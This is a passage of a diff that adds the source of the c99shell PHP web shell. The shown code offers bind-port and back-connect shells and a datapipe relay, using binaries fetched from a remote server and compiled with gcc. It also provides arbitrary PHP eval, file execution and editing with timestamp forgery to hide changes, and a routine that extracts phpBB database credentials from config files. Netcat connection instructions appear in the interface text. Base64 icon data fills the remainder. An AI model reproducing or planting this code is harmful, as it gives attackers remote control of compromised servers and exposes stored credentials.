    ";} + elseif (!$data = c99getsource($bind["src"])) {echo "Can't download sources!";} + else + { + fwrite($fp,$data,strlen($data)); + fclose($fp); + if ($ext == "c") {$retgcc = myshellexec("gcc -o ".$binpath." ".$srcpath); @unlink($srcpath);} + $v[1] = str_replace("%path",$binpath,$v[1]); + $v[1] = str_replace("%port",$bind["port"],$v[1]); + $v[1] = str_replace("%pass",$bind["pass"],$v[1]); + $v[1] = str_replace("//","/",$v[1]); + $retbind = myshellexec($v[1]." > /dev/null &"); + sleep(5); + $sock = fsockopen("localhost",$bind["port"],$errno,$errstr,5); + if (!$sock) {echo "I can't connect to localhost:".$bind["port"]."! I think you should configure your firewall.";} + else {echo "Binding... ok! Connect to ".getenv("SERVER_ADDR").":".$bind["port"]."! You should use NetCat©, run \"nc -v ".getenv("SERVER_ADDR")." ".$bind["port"]."\"!
    View binder's process
    ";} + } + echo "
    "; + } +} +if (!empty($bcsubmit)) +{ + echo "Result of back connection:
    "; + $v = $bcsrcs[$bc["src"]]; + if (empty($v)) {echo "Unknown file!
    ";} + else + { + $w = explode(".",$bc["src"]); + $ext = $w[count($w)-1]; + unset($w[count($w)-1]); + $srcpath = join(".",$w).".".rand(0,999).".".$ext; + $binpath = $tmpdir.join(".",$w).rand(0,999); + if ($ext == "pl") {$binpath = $srcpath;} + @unlink($srcpath); + $fp = fopen($srcpath,"ab+"); + if (!$fp) {echo "Can't write sources to \"".$srcpath."\"!
    ";} + elseif (!$data = c99getsource($bc["src"])) {echo "Can't download sources!";} + else + { + fwrite($fp,$data,strlen($data)); + fclose($fp); + if ($ext == "c") {$retgcc = myshellexec("gcc -o ".$binpath." ".$srcpath); @unlink($srcpath);} + $v[1] = str_replace("%path",$binpath,$v[1]); + $v[1] = str_replace("%host",$bc["host"],$v[1]); + $v[1] = str_replace("%port",$bc["port"],$v[1]); + $v[1] = str_replace("//","/",$v[1]); + $retbind = myshellexec($v[1]." > /dev/null &"); + echo "Now script try connect to ".htmlspecialchars($bc["host"]).":".htmlspecialchars($bc["port"])."...
    "; + } + } +} +if (!empty($dpsubmit)) +{ + echo "Result of datapipe-running:
    "; + $v = $dpsrcs[$datapipe["src"]]; + if (empty($v)) {echo "Unknown file!
    ";} + elseif (fsockopen(getenv("SERVER_ADDR"),$datapipe["port"],$errno,$errstr,0.1)) {echo "Port alredy in use, select any other!
    ";} + else + { + $srcpath = $tmpdir.$datapipe["src"]; + $w = explode(".",$datapipe["src"]); + $ext = $w[count($w)-1]; + unset($w[count($w)-1]); + $srcpath = join(".",$w).".".rand(0,999).".".$ext; + $binpath = $tmpdir.join(".",$w).rand(0,999); + if ($ext == "pl") {$binpath = $srcpath;} + @unlink($srcpath); + $fp = fopen($srcpath,"ab+"); + if (!$fp) {echo "Can't write sources to \"".$srcpath."\"!
    ";} + elseif (!$data = c99getsource($datapipe["src"])) {echo "Can't download sources!";} + else + { + fwrite($fp,$data,strlen($data)); + fclose($fp); + if ($ext == "c") {$retgcc = myshellexec("gcc -o ".$binpath." ".$srcpath); @unlink($srcpath);} + list($datapipe["remotehost"],$datapipe["remoteport"]) = explode(":",$datapipe["remoteaddr"]); + $v[1] = str_replace("%path",$binpath,$v[1]); + $v[1] = str_replace("%localport",$datapipe["localport"],$v[1]); + $v[1] = str_replace("%remotehost",$datapipe["remotehost"],$v[1]); + $v[1] = str_replace("%remoteport",$datapipe["remoteport"],$v[1]); + $v[1] = str_replace("//","/",$v[1]); + $retbind = myshellexec($v[1]." > /dev/null &"); + sleep(5); + $sock = fsockopen("localhost",$datapipe["port"],$errno,$errstr,5); + if (!$sock) {echo "I can't connect to localhost:".$datapipe["localport"]."! I think you should configure your firewall.";} + else {echo "Running datapipe... ok! Connect to ".getenv("SERVER_ADDR").":".$datapipe["port"].", and you will connected to ".$datapipe["remoteaddr"]."! You should use NetCat©, run \"nc -v ".getenv("SERVER_ADDR")." ".$bind["port"]."\"!
    View datapipe process
    ";} + } + echo "
    "; + } +} +?>Binding port:
    Port: "> Password: ">  
    +Back connection:
    HOST: "> Port: ">  
    +Click "Connect" only after open port for it. You should use NetCat©, run "nc -l -n -v -p "!

    +Datapipe:
    HOST: "> Local port: ">  
    Note: sources will be downloaded from remote server.Processes:

    "; +if (!$win) {$handler = "ps -aux".($grep?" | grep '".addslashes($grep)."'":"");} +else {$handler = "tasklist";} +$ret = myshellexec($handler); +if (!$ret) {echo "Can't execute \"".$handler."\"!";} +else +{ + if (empty($processes_sort)) {$processes_sort = $sort_default;} + $parsesort = parsesort($processes_sort); + if (!is_numeric($parsesort[0])) {$parsesort[0] = 0;} + $k = $parsesort[0]; + if ($parsesort[1] != "a") {$y = "";} + else {$y = "";} + $ret = htmlspecialchars($ret); + if (!$win) + { + if ($pid) + { + if (is_null($sig)) {$sig = 9;} + echo "Sending signal ".$sig." to #".$pid."... "; + if (posix_kill($pid,$sig)) {echo "OK.";} + else {echo "ERROR.";} + } + while (ereg(" ",$ret)) {$ret = str_replace(" "," ",$ret);} + $stack = explode("\n",$ret); + $head = explode(" ",$stack[0]); + unset($stack[0]); + for($i=0;$i".$head[$i]."";} + } + $prcs = array(); + foreach ($stack as $line) + { + if (!empty($line)) + { + echo "
    "; + foreach($tab as $i=>$k) + { + echo ""; + foreach($k as $j=>$v) {if ($win and $i > 0 and $j == 2) {$v = view_size($v);} echo "";} + echo ""; + } + echo "
    ".$v."
    "; +} +} +if ($act == "eval") +{ +if (!empty($eval)) +{ + echo "Result of execution this PHP-code:
    "; + $tmp = ob_get_contents(); + $olddir = realpath("."); + @chdir($d); + if ($tmp) + { + ob_clean(); + eval($eval); + $ret = ob_get_contents(); + $ret = convert_cyr_string($ret,"d","w"); + ob_clean(); + echo $tmp; + if ($eval_txt) + { + $rows = count(explode("\r\n",$ret))+1; + if ($rows < 10) {$rows = 10;} + echo "
    "; + } + else {echo $ret."
    ";} + } + else + { + if ($eval_txt) + { + echo "
    "; + } + else {echo $ret;} + } + @chdir($olddir); +} +else {echo "Execution PHP-code"; if (empty($eval_txt)) {$eval_txt = true;}} +echo "


     Display in text-area 
    "; +} +if ($act == "f") +{ +if ((!is_readable($d.$f) or is_dir($d.$f)) and $ft != "edit") +{ + if (file_exists($d.$f)) {echo "
    Permision denied (".htmlspecialchars($d.$f).")!
    ";} + else {echo "
    File does not exists (".htmlspecialchars($d.$f).")!
    Create
    ";} +} +else +{ + $r = @file_get_contents($d.$f); + $ext = explode(".",$f); + $c = count($ext)-1; + $ext = $ext[$c]; + $ext = strtolower($ext); + $rft = ""; + foreach($ftypes as $k=>$v) {if (in_array($ext,$v)) {$rft = $k; break;}} + if (eregi("sess_(.*)",$f)) {$rft = "phpsess";} + if (empty($ft)) {$ft = $rft;} + $arr = array( + array("","info"), + array("","html"), + array("","txt"), + array("Code","code"), + array("Session","phpsess"), + array("","exe"), + array("SDB","sdb"), + array("","img"), + array("","ini"), + array("","download"), + array("","notepad"), + array("","edit") + ); + echo "Viewing file:     ".$f." (".view_size(filesize($d.$f)).")      ".view_perms_color($d.$f)."
    Select action/file-type:
    "; + foreach($arr as $t) + { + if ($t[1] == $rft) {echo " ".$t[0]."";} + elseif ($t[1] == $ft) {echo " ".$t[0]."";} + else {echo " ".$t[0]."";} + echo " (+) |"; + } + echo "
    "; + if ($ft == "info") + { + echo "Information:"; + if (!$win) + { + echo "
    Path ".$d.$f."
    Size ".view_size(filesize($d.$f))."
    MD5 ".md5_file($d.$f)."
    Owner/Group "; + $ow = posix_getpwuid(fileowner($d.$f)); + $gr = posix_getgrgid(filegroup($d.$f)); + echo ($ow["name"]?$ow["name"]:fileowner($d.$f))."/".($gr["name"]?$gr["name"]:filegroup($d.$f)); + } + echo "
    Perms".view_perms_color($d.$f)."
    Create time ".date("d/m/Y H:i:s",filectime($d.$f))."
    Access time ".date("d/m/Y H:i:s",fileatime($d.$f))."
    MODIFY time ".date("d/m/Y H:i:s",filemtime($d.$f))."

    "; + $fi = fopen($d.$f,"rb"); + if ($fi) + { + if ($fullhexdump) {echo "FULL HEXDUMP"; $str = fread($fi,filesize($d.$f));} + else {echo "HEXDUMP PREVIEW"; $str = fread($fi,$hexdump_lines*$hexdump_rows);} + $n = 0; + $a0 = "00000000
    "; + $a1 = ""; + $a2 = ""; + for ($i=0; $i";} + $a1 .= "
    "; + $a2 .= "
    "; + } + } + //if ($a1 != "") {$a0 .= sprintf("%08X",$i)."
    ";} + echo "
    ".$a0."".$a1."".$a2."

    "; + } + $encoded = ""; + if ($base64 == 1) + { + echo "Base64 Encode
    "; + $encoded = base64_encode(file_get_contents($d.$f)); + } + elseif($base64 == 2) + { + echo "Base64 Encode + Chunk
    "; + $encoded = chunk_split(base64_encode(file_get_contents($d.$f))); + } + elseif($base64 == 3) + { + echo "Base64 Encode + Chunk + Quotes
    "; + $encoded = base64_encode(file_get_contents($d.$f)); + $encoded = substr(preg_replace("!.{1,76}!","'\\0'.\n",$encoded),0,-2); + } + elseif($base64 == 4) + { + $text = file_get_contents($d.$f); + $encoded = base64_decode($text); + echo "Base64 Decode"; + if (base64_encode($encoded) != $text) {echo " (failed)";} + echo "
    "; + } + if (!empty($encoded)) + { + echo "

    "; + } + echo "HEXDUMP: [Full] [Preview]
    Base64: +
    [Encode +[+chunk +[+chunk+quotes +[Decode +

    "; + } + elseif ($ft == "html") + { + if ($white) {@ob_clean();} + echo $r; + if ($white) {c99shexit();} + } + elseif ($ft == "txt") {echo "

    ".htmlspecialchars($r)."
    ";} + elseif ($ft == "ini") {echo "
    "; var_dump(parse_ini_file($d.$f,true)); echo "
    ";} + elseif ($ft == "phpsess") + { + echo "
    ";
    
    +   $v = explode("|",$r);
    
    +   echo $v[0]."
    "; + var_dump(unserialize($v[1])); + echo "
    "; + } + elseif ($ft == "exe") + { + $ext = explode(".",$f); + $c = count($ext)-1; + $ext = $ext[$c]; + $ext = strtolower($ext); + $rft = ""; + foreach($exeftypes as $k=>$v) + { + if (in_array($ext,$v)) {$rft = $k; break;} + } + $cmd = str_replace("%f%",$f,$rft); + echo "Execute file:

    Display in text-area
    "; + } + elseif ($ft == "sdb") {echo "
    "; var_dump(unserialize(base64_decode($r))); echo "
    ";} + elseif ($ft == "code") + { + if (ereg("php"."BB 2.(.*) auto-generated config file",$r)) + { + $arr = explode("\n",$r); + if (count($arr == 18)) + { + include($d.$f); + echo "phpBB configuration is detected in this file!
    "; + if ($dbms == "mysql4") {$dbms = "mysql";} + if ($dbms == "mysql") {echo "Connect to DB

    ";} + else {echo "But, you can't connect to forum sql-base, because db-software=\"".$dbms."\" is not supported by c99shell. Please, report us for fix.";} + echo "Parameters for manual connect:
    "; + $cfgvars = array("dbms"=>$dbms,"dbhost"=>$dbhost,"dbname"=>$dbname,"dbuser"=>$dbuser,"dbpasswd"=>$dbpasswd); + foreach ($cfgvars as $k=>$v) {echo htmlspecialchars($k)."='".htmlspecialchars($v)."'
    ";} + echo "

    "; + } + } + echo "
    "; + if (!empty($white)) {@ob_clean();} + highlight_file($d.$f); + if (!empty($white)) {c99shexit();} + echo "
    "; + } + elseif ($ft == "download") + { + @ob_clean(); + header("Content-type: application/octet-stream"); + header("Content-length: ".filesize($d.$f)); + header("Content-disposition: attachment; filename=\"".$f."\";"); + echo $r; + exit; + } + elseif ($ft == "notepad") + { + @ob_clean(); + header("Content-type: text/plain"); + header("Content-disposition: attachment; filename=\"".$f.".txt\";"); + echo($r); + exit; + } + elseif ($ft == "img") + { + $inf = getimagesize($d.$f); + if (!$white) + { + if (empty($imgsize)) {$imgsize = 20;} + $width = $inf[0]/100*$imgsize; + $height = $inf[1]/100*$imgsize; + echo "
    Size: "; + $sizes = array("100","50","20"); + foreach ($sizes as $v) + { + echo ""; + if ($imgsize != $v ) {echo $v;} + else {echo "".$v."";} + echo "   "; + } + echo "

    "; + } + else + { + @ob_clean(); + $ext = explode($f,"."); + $ext = $ext[count($ext)-1]; + header("Content-type: ".$inf["mime"]); + readfile($d.$f); + exit; + } + } + elseif ($ft == "edit") + { + if (!empty($submit)) + { + if ($filestealth) {$stat = stat($d.$f);} + $fp = fopen($d.$f,"w"); + if (!$fp) {echo "Can't write to file!";} + else + { + echo "Saved!"; + fwrite($fp,$edit_text); + fclose($fp); + if ($filestealth) {touch($d.$f,$stat[9],$stat[8]);} + $r = $edit_text; + } + } + $rows = count(explode("\r\n",$r)); + if ($rows < 10) {$rows = 10;} + if ($rows > 30) {$rows = 30;} + echo "
      
    "; + } + elseif (!empty($ft)) {echo "
    Manually selected type is incorrect. If you think, it is mistake, please send us url and dump of \$GLOBALS.
    ";} + else {echo "
    Unknown extension (".$ext."), please, select type manually.
    ";} +} +} +} +else +{ +@ob_clean(); +$images = array( +"arrow_ltr"=> +"R0lGODlhJgAWAIAAAAAAAP///yH5BAUUAAEALAAAAAAmABYAAAIvjI+py+0PF4i0gVvzuVxXDnoQ". +"SIrUZGZoerKf28KjPNPOaku5RfZ+uQsKh8RiogAAOw==", +"back"=> +"R0lGODlhFAAUAKIAAAAAAP///93d3cDAwIaGhgQEBP///wAAACH5BAEAAAYALAAAAAAUABQAAAM8". +"aLrc/jDKSWWpjVysSNiYJ4CUOBJoqjniILzwuzLtYN/3zBSErf6kBW+gKRiPRghPh+EFK0mOUEqt". +"Wg0JADs=", +"buffer"=> +"R0lGODlhFAAUAKIAAAAAAP////j4+N3d3czMzLKysoaGhv///yH5BAEAAAcALAAAAAAUABQAAANo". +"eLrcribG90y4F1Amu5+NhY2kxl2CMKwrQRSGuVjp4LmwDAWqiAGFXChg+xhnRB+ptLOhai1crEmD". +"Dlwv4cEC46mi2YgJQKaxsEGDFnnGwWDTEzj9jrPRdbhuG8Cr/2INZIOEhXsbDwkAOw==", +"change"=> +"R0lGODlhFAAUAMQfAL3hj7nX+pqo1ejy/f7YAcTb+8vh+6FtH56WZtvr/RAQEZecx9Ll/PX6/v3+". +"/3eHt6q88eHu/ZkfH3yVyIuQt+72/kOm99fo/P8AZm57rkGS4Hez6pil9oep3GZmZv///yH5BAEA". +"AB8ALAAAAAAUABQAAAWf4CeOZGme6NmtLOulX+c4TVNVQ7e9qFzfg4HFonkdJA5S54cbRAoFyEOC". +"wSiUtmYkkrgwOAeA5zrqaLldBiNMIJeD266XYTgQDm5Rx8mdG+oAbSYdaH4Ga3c8JBMJaXQGBQgA". +"CHkjE4aQkQ0AlSITan+ZAQqkiiQPj1AFAaMKEKYjD39QrKwKAa8nGQK8Agu/CxTCsCMexsfIxjDL". +"zMshADs=", +"delete"=> +"R0lGODlhFAAUAOZZAPz8/NPFyNgHLs0YOvPz8/b29sacpNXV1fX19cwXOfDw8Kenp/n5+etgeunp". +"6dcGLMMpRurq6pKSktvb2+/v7+1wh3R0dPnP17iAipxyel9fX7djcscSM93d3ZGRkeEsTevd4LCw". +"sGRkZGpOU+IfQ+EQNoh6fdIcPeHh4YWFhbJQYvLy8ui+xm5ubsxccOx8kcM4UtY9WeAdQYmJifWv". +"vHx8fMnJycM3Uf3v8rRue98ONbOzs9YFK5SUlKYoP+Tk5N0oSufn57ZGWsQrR9kIL5CQkOPj42Vl". +"ZeAPNudAX9sKMPv7+15QU5ubm39/f8e5u4xiatra2ubKz8PDw+pfee9/lMK0t81rfd8AKf///wAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5". +"BAEAAFkALAAAAAAUABQAAAesgFmCg4SFhoeIhiUfIImIMlgQB46GLAlYQkaFVVhSAIZLT5cbEYI4". +"STo5MxOfhQwBA1gYChckQBk1OwiIALACLkgxJilTBI69RFhDFh4HDJRZVFgPPFBR0FkNWDdMHA8G". +"BZTaMCISVgMC4IkVWCcaPSi96OqGNFhKI04dgr0QWFcKDL3A4uOIjVZZABxQIWDBLkIEQrRoQsHQ". +"jwVFHBgiEGQFIgQasYkcSbJQIAA7", +"download"=> +"R0lGODlhFAAUALMIAAD/AACAAIAAAMDAwH9/f/8AAP///wAAAP///wAAAAAAAAAAAAAAAAAAAAAA". +"AAAAACH5BAEAAAgALAAAAAAUABQAAAROEMlJq704UyGOvkLhfVU4kpOJSpx5nF9YiCtLf0SuH7pu". +"EYOgcBgkwAiGpHKZzB2JxADASQFCidQJsMfdGqsDJnOQlXTP38przWbX3qgIADs=", +"forward"=> +"R0lGODlhFAAUAPIAAAAAAP///93d3cDAwIaGhgQEBP///wAAACH5BAEAAAYALAAAAAAUABQAAAM8". +"aLrc/jDK2Qp9xV5WiN5G50FZaRLD6IhE66Lpt3RDbd9CQFSE4P++QW7He7UKPh0IqVw2l0RQSEqt". +"WqsJADs=", +"home"=> +"R0lGODlhFAAUALMAAAAAAP///+rq6t3d3czMzLKysoaGhmZmZgQEBP///wAAAAAAAAAAAAAAAAAA". +"AAAAACH5BAEAAAkALAAAAAAUABQAAAR+MMk5TTWI6ipyMoO3cUWRgeJoCCaLoKO0mq0ZxjNSBDWS". +"krqAsLfJ7YQBl4tiRCYFSpPMdRRCoQOiL4i8CgZgk09WfWLBYZHB6UWjCequwEDHuOEVK3QtgN/j". +"VwMrBDZvgF+ChHaGeYiCBQYHCH8VBJaWdAeSl5YiW5+goBIRADs=", +"mode"=> +"R0lGODlhHQAUALMAAAAAAP///6CgpN3d3czMzIaGhmZmZl9fX////wAAAAAAAAAAAAAAAAAAAAAA". +"AAAAACH5BAEAAAgALAAAAAAdABQAAASBEMlJq70461m6/+AHZMUgnGiqniNWHHAsz3F7FUGu73xO". +"2BZcwGDoEXk/Uq4ICACeQ6fzmXTlns0ddle99b7cFvYpER55Z10Xy1lKt8wpoIsACrdaqBpYEYK/". +"dH1LRWiEe0pRTXBvVHwUd3o6eD6OHASXmJmamJUSY5+gnxujpBIRADs=", +"refresh"=> +"R0lGODlhEQAUALMAAAAAAP////Hx8erq6uPj493d3czMzLKysoaGhmZmZl9fXwQEBP///wAAAAAA". +"AAAAACH5BAEAAAwALAAAAAARABQAAAR1kMlJq0Q460xR+GAoIMvkheIYlMyJBkJ8lm6YxMKi6zWY". +"3AKCYbjo/Y4EQqFgKIYUh8EvuWQ6PwPFQJpULpunrXZLrYKx20G3oDA7093Esv19q5O/woFu9ZAJ". +"R3lufmWCVX13h3KHfWWMjGBDkpOUTTuXmJgRADs=", +"search"=> +"R0lGODlhFAAUALMAAAAAAP///+rq6t3d3czMzMDAwLKysoaGhnd3d2ZmZl9fX01NTSkpKQQEBP//". +"/wAAACH5BAEAAA4ALAAAAAAUABQAAASn0Ml5qj0z5xr6+JZGeUZpHIqRNOIRfIYiy+a6vcOpHOap". +"s5IKQccz8XgK4EGgQqWMvkrSscylhoaFVmuZLgUDAnZxEBMODSnrkhiSCZ4CGrUWMA+LLDxuSHsD". +"AkN4C3sfBX10VHaBJ4QfA4eIU4pijQcFmCVoNkFlggcMRScNSUCdJyhoDasNZ5MTDVsXBwlviRmr". +"Cbq7C6sIrqawrKwTv68iyA6rDhEAOw==", +"setup"=> +"R0lGODlhFAAUAMQAAAAAAP////j4+OPj493d3czMzMDAwLKyspaWloaGhnd3d2ZmZl9fX01NTUJC". +"QhwcHP///wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAEA". +"ABAALAAAAAAUABQAAAWVICSKikKWaDmuShCUbjzMwEoGhVvsfHEENRYOgegljkeg0PF4KBIFRMIB". +"qCaCJ4eIGQVoIVWsTfQoXMfoUfmMZrgZ2GNDPGII7gJDLYErwG1vgW8CCQtzgHiJAnaFhyt2dwQE". +"OwcMZoZ0kJKUlZeOdQKbPgedjZmhnAcJlqaIqUesmIikpEixnyJhulUMhg24aSO6YyEAOw==", +"small_dir"=> +"R0lGODlhEwAQALMAAAAAAP///5ycAM7OY///nP//zv/OnPf39////wAAAAAAAAAAAAAAAAAAAAAA". +"AAAAACH5BAEAAAgALAAAAAATABAAAARREMlJq7046yp6BxsiHEVBEAKYCUPrDp7HlXRdEoMqCebp". +"/4YchffzGQhH4YRYPB2DOlHPiKwqd1Pq8yrVVg3QYeH5RYK5rJfaFUUA3vB4fBIBADs=", +"small_unk"=> +"R0lGODlhEAAQAHcAACH5BAEAAJUALAAAAAAQABAAhwAAAIep3BE9mllic3B5iVpjdMvh/MLc+y1U". +"p9Pm/GVufc7j/MzV/9Xm/EOm99bn/Njp/a7Q+tTm/LHS+eXw/t3r/Nnp/djo/Nrq/fj7/9vq/Nfo". +"/Mbe+8rh/Mng+7jW+rvY+r7Z+7XR9dDk/NHk/NLl/LTU+rnX+8zi/LbV++fx/e72/vH3/vL4/u31". +"/e31/uDu/dzr/Orz/eHu/fX6/vH4/v////v+/3ez6vf7//T5/kGS4Pv9/7XV+rHT+r/b+rza+vP4". +"/uz0/urz/u71/uvz/dTn/M/k/N3s/dvr/cjg+8Pd+8Hc+sff+8Te+/D2/rXI8rHF8brM87fJ8nmP". +"wr3N86/D8KvB8F9neEFotEBntENptENptSxUpx1IoDlfrTRcrZeeyZacxpmhzIuRtpWZxIuOuKqz". +"9ZOWwX6Is3WIu5im07rJ9J2t2Zek0m57rpqo1nKCtUVrtYir3vf6/46v4Yuu4WZvfr7P6sPS6sDQ". +"66XB6cjZ8a/K79/s/dbn/ezz/czd9mN0jKTB6ai/76W97niXz2GCwV6AwUdstXyVyGSDwnmYz4io". +"24Oi1a3B45Sy4ae944Ccz4Sj1n2GlgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAjnACtVCkCw4JxJAQQqFBjAxo0MNGqsABQAh6CFA3nk0MHiRREVDhzsoLQwAJ0gT4ToecSHAYMz". +"aQgoDNCCSB4EAnImCiSBjUyGLobgXBTpkAA5I6pgmSkDz5cuMSz8yWlAyoCZFGb4SQKhASMBXJpM". +"uSrQEQwkGjYkQCTAy6AlUMhWklQBw4MEhgSA6XPgRxS5ii40KLFgi4BGTEKAsCKXihESCzrsgSQC". +"yIkUV+SqOYLCA4csAup86OGDkNw4BpQ4OaBFgB0TEyIUKqDwTRs4a9yMCSOmDBoyZu4sJKCgwIDj". +"yAsokBkQADs=", +"multipage"=>"R0lGODlhCgAMAJEDAP/////3mQAAAAAAACH5BAEAAAMALAAAAAAKAAwAAAIj3IR". +"pJhCODnovidAovBdMzzkixlXdlI2oZpJWEsSywLzRUAAAOw==", +"sort_asc"=> +"R0lGODlhDgAJAKIAAAAAAP///9TQyICAgP///wAAAAAAAAAAACH5BAEAAAQALAAAAAAOAAkAAAMa". +"SLrcPcE9GKUaQlQ5sN5PloFLJ35OoK6q5SYAOw==", +"sort_desc"=> +"R0lGODlhDgAJAKIAAAAAAP///9TQyICAgP///wAAAAAAAAAAACH5BAEAAAQALAAAAAAOAAkAAAMb". +"SLrcOjBCB4UVITgyLt5ch2mgSJZDBi7p6hIJADs=", +"sql_button_drop"=> +"R0lGODlhCQALAPcAAAAAAIAAAACAAICAAAAAgIAAgACAgICAgMDAwP8AAAD/AP//AAAA//8A/wD/". +"/////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMwAAZgAAmQAAzAAA/wAzAAAzMwAzZgAzmQAzzAAz/wBm". +"AABmMwBmZgBmmQBmzABm/wCZAACZMwCZZgCZmQCZzACZ/wDMAADMMwDMZgDMmQDMzADM/wD/AAD/". +"MwD/ZgD/mQD/zAD//zMAADMAMzMAZjMAmTMAzDMA/zMzADMzMzMzZjMzmTMzzDMz/zNmADNmMzNm". +"ZjNmmTNmzDNm/zOZADOZMzOZZjOZmTOZzDOZ/zPMADPMMzPMZjPMmTPMzDPM/zP/ADP/MzP/ZjP/". +"mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYzmWYzzGYz/2ZmAGZmM2ZmZmZmmWZm". +"zGZm/2aZAGaZM2aZZmaZmWaZzGaZ/2bMAGbMM2bMZmbMmWbMzGbM/2b/AGb/M2b/Zmb/mWb/zGb/". +"/5kAAJkAM5kAZpkAmZkAzJkA/5kzAJkzM5kzZpkzmZkzzJkz/5lmAJlmM5lmZplmmZlmzJlm/5mZ". +"AJmZM5mZZpmZmZmZzJmZ/5nMAJnMM5nMZpnMmZnMzJnM/5n/AJn/M5n/Zpn/mZn/zJn//8wAAMwA". +"M8wAZswAmcwAzMwA/8wzAMwzM8wzZswzmcwzzMwz/8xmAMxmM8xmZsxmmcxmzMxm/8yZAMyZM8yZ". +"ZsyZmcyZzMyZ/8zMAMzMM8zMZszMmczMzMzM/8z/AMz/M8z/Zsz/mcz/zMz///8AAP8AM/8AZv8A". +"mf8AzP8A//8zAP8zM/8zZv8zmf8zzP8z//9mAP9mM/9mZv9mmf9mzP9m//+ZAP+ZM/+ZZv+Zmf+Z". +"zP+Z///MAP/MM//MZv/Mmf/MzP/M////AP//M///Zv//mf//zP///yH5BAEAABAALAAAAAAJAAsA". +"AAg4AP8JREFQ4D+CCBOi4MawITeFCg/iQhEPxcSBlFCoQ5Fx4MSKv1BgRGGMo0iJFC2ehHjSoMt/". +"AQEAOw==", +"sql_button_empty"=> +"R0lGODlhCQAKAPcAAAAAAIAAAACAAICAAAAAgIAAgACAgICAgMDAwP8AAAD/AP//AAAA//8A/wD/". +"/////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMwAAZgAAmQAAzAAA/wAzAAAzMwAzZgAzmQAzzAAz/wBm". +"AABmMwBmZgBmmQBmzABm/wCZAACZMwCZZgCZmQCZzACZ/wDMAADMMwDMZgDMmQDMzADM/wD/AAD/". +"MwD/ZgD/mQD/zAD//zMAADMAMzMAZjMAmTMAzDMA/zMzADMzMzMzZjMzmTMzzDMz/zNmADNmMzNm". +"ZjNmmTNmzDNm/zOZADOZMzOZZjOZmTOZzDOZ/zPMADPMMzPMZjPMmTPMzDPM/zP/ADP/MzP/ZjP/". +"mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYzmWYzzGYz/2ZmAGZmM2ZmZmZmmWZm". +"zGZm/2aZAGaZM2aZZmaZmWaZzGaZ/2bMAGbMM2bMZmbMmWbMzGbM/2b/AGb/M2b/Zmb/mWb/zGb/". +"/5kAAJkAM5kAZpkAmZkAzJkA/5kzAJkzM5kzZpkzmZkzzJkz/5lmAJlmM5lmZplmmZlmzJlm/5mZ". +"AJmZM5mZZpmZmZmZzJmZ/5nMAJnMM5nMZpnMmZnMzJnM/5n/AJn/M5n/Zpn/mZn/zJn//8wAAMwA". +"M8wAZswAmcwAzMwA/8wzAMwzM8wzZswzmcwzzMwz/8xmAMxmM8xmZsxmmcxmzMxm/8yZAMyZM8yZ". +"ZsyZmcyZzMyZ/8zMAMzMM8zMZszMmczMzMzM/8z/AMz/M8z/Zsz/mcz/zMz///8AAP8AM/8AZv8A". +"mf8AzP8A//8zAP8zM/8zZv8zmf8zzP8z//9mAP9mM/9mZv9mmf9mzP9m//+ZAP+ZM/+ZZv+Zmf+Z". +"zP+Z///MAP/MM//MZv/Mmf/MzP/M////AP//M///Zv//mf//zP///yH5BAEAABAALAAAAAAJAAoA". +"AAgjAP8JREFQ4D+CCBOiMMhQocKDEBcujEiRosSBFjFenOhwYUAAOw==", +"sql_button_insert"=> +"R0lGODlhDQAMAPcAAAAAAIAAAACAAICAAAAAgIAAgACAgICAgMDAwP8AAAD/AP//AAAA//8A/wD/". +"/////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMwAAZgAAmQAAzAAA/wAzAAAzMwAzZgAzmQAzzAAz/wBm". +"AABmMwBmZgBmmQBmzABm/wCZAACZMwCZZgCZmQCZzACZ/wDMAADMMwDMZgDMmQDMzADM/wD/AAD/". +"MwD/ZgD/mQD/zAD//zMAADMAMzMAZjMAmTMAzDMA/zMzADMzMzMzZjMzmTMzzDMz/zNmADNmMzNm". +"ZjNmmTNmzDNm/zOZADOZMzOZZjOZmTOZzDOZ/zPMADPMMzPMZjPMmTPMzDPM/zP/ADP/MzP/ZjP/". +"mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYzmWYzzGYz/2ZmAGZmM2ZmZmZmmWZm". +"zGZm/2aZAGaZM2aZZmaZmWaZzGaZ/2bMAGbMM2bMZmbMmWbMzGbM/2b/AGb/M2b/Zmb/mWb/zGb/". 